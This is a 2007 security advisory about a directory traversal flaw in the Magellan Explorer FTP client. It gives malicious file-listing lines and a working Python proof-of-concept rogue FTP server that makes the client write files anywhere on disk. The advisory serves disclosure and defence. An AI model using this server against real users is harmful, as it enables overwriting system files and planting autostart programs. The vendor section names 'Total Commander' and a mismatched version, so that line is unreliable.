HISPASEC Security Advisory http://blog.hispasec.com/lab/ Name : 2K7SEPT6 Magellan Explorer 3.32 build 2305 Remote FTP Client Directory Traversal Class : Remote Directory Traversal Threat level : HIGH Discovered : 2007-08-14 Published : 2007-09-06 Credit : Gynvael Coldwind Vulnerable : 3.32 built 2305 and prior, other versions may be affected == Abstract == Enriva Development Magellan Explorer is an award winning Windows file explorer with a built-in support for FTP protocol. Magellan Explorer fails to correctly handle file names on remote FTP servers while downloading them to a local drive. This may lead to a directory traversal if a malformed file name contains relative path. Successful exploitation may lead to a full scale system compromise. == Details == The FTP feature fails to correctly check the name of a file that is to be downloaded. This filename can contain backslashes, slashes and dots, and these dots and backslashes will be used as a part of a local file name. An example file list sent from the FTP server can look like this: -rwxr-xr-x 2 ftp ftp 4096 Aug 1 02:28 st\..\..\..\..\..\BackSlashPoC -rwxr-xr-x 2 ftp ftp 4096 Aug 1 02:28 st/../../../../../SlashPoC When the user chooses to download the file (or a directory in which this file exists), the Magellan Explorer will try to create the file on a local harddrive using the dots and backslashes as a part of a name. Since more then enough \..\..\ will just bring the path to the disk root, the attacker can choose any location on the disk to write the file to. The file can for example overwrite a critical system file, or create a file in the Autostart folder. See Proof of Concept exploit at the bottom of this advisory. == Vendor status and solution == The vendor has been informed and has released a new version (7.02) with this issue being fixed. It is advised to upgrade Total Commander to the newest version availible. == Proof of Concept == # python localhost ftp server # by Gynvael Coldwind import socket TransferSock = 0 def sendDirList (sock): (DataSock, Address) = TransferSock.accept() print "sendDirList: TransferSock accepted a connection" sock.send("150 Opening ASCII mode data connection for file list\r\n"); DataSock.send("-rwxr-xr-x 2 ftp ftp 4096 Aug 1 02:28 st\\..\\..\\..\\..\\..\\BackSlashPoC\n" + "-rwxr-xr-x 2 ftp ftp 4096 Aug 1 02:28 st/../../../../../../SlashPoC\n"); DataSock.close() sock.send("226 Transfer complete.\r\n"); print "sendDirList: Transfer complete\r\n" def sendFile (sock): (DataSock, Address) = TransferSock.accept() print "sendDirList: TransferSock accepted a connection" sock.send("150 Opening BINARY mode data connection for sth (5 bytes)\r\n"); DataSock.send("Proof of Concept - Remote FTP Client directory traversal vulnerability (G.C. - Hispasec)"); DataSock.close() sock.send("226 Transfer complete.\r\n"); print "sendDirList: Transfer complete\r\n" def handleUSER (sock, cmd, argz): sock.send("331 Password required for user\r\n") def handlePASS (sock, cmd, argz): sock.send("230 User logged in.\r\n") def handleSYST (sock, cmd, argz): sock.send("215 UNIX Type: L8\r\n") def handleFEAT (sock, cmd, argz): sock.send("211-Features:\r\n MDTM\r\n REST STREAM\r\n211 End\r\n"); def handleTYPE (sock, cmd, argz): sock.send("200 Type set to " + argz + "\r\n"); def handlePASV (sock, cmd, argz): sock.send("227 Entering Passive Mode (127,0,0,1,10,10)\r\n"); def handlePWD (sock, cmd, argz): sock.send("257 \"/ProofOfConcept\" is current directory.\r\n") def handleLIST (sock, cmd, argz): sendDirList(sock) def handleQUIT (sock, cmd, argz): sock.send("Bye.\r\n") sock.close() def handleRETR (sock, cmd, argz): if argz == "/": sendDirList(sock) else: sendFile(sock) def unknown (sock, cmd, argz): sock.send("550 " + cmd + ": Operation not permitted\r\n") handlers = { 'USER': handleUSER, 'PASS': handlePASS, 'SYST': handleSYST, 'FEAT': handleFEAT, 'TYPE': handleTYPE, 'PASV': handlePASV, 'PWD': handlePWD, 'LIST': handleLIST, 'QUIT': handleQUIT, 'RETR': handleRETR } ControlSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ControlSock.bind(("127.0.0.1", 2021)) ControlSock.listen(1) TransferSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) TransferSock.bind(("127.0.0.1", 10 * 256 + 10)) TransferSock.listen(10) # Control Sock loop (ClientSock, Address) = ControlSock.accept() ClientSock.send("220 PoCFTPD 1.2.3.4 Server ready.\r\n"); end = 0 while not end: cmd = ClientSock.recv(1024) print "Debug: recv -> " + cmd.strip() command = (cmd[0:4]).strip() argz = ((cmd.strip())[5:]).strip() handlers.get(command, unknown)(ClientSock, command, argz) == Disclaimer == This document and all the information it contains is provided "as is", without any warranty. Hispasec Sistemas is not responsible for the misuse of the information provided in this advisory. The advisory is provided for educational purposes only. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact. Copyright (C) 2007 Hispasec Sistemas. -- Gynvael Coldwind mailto: gynvael AT vexillium DOT org mailto: michael AT hispasec DOT com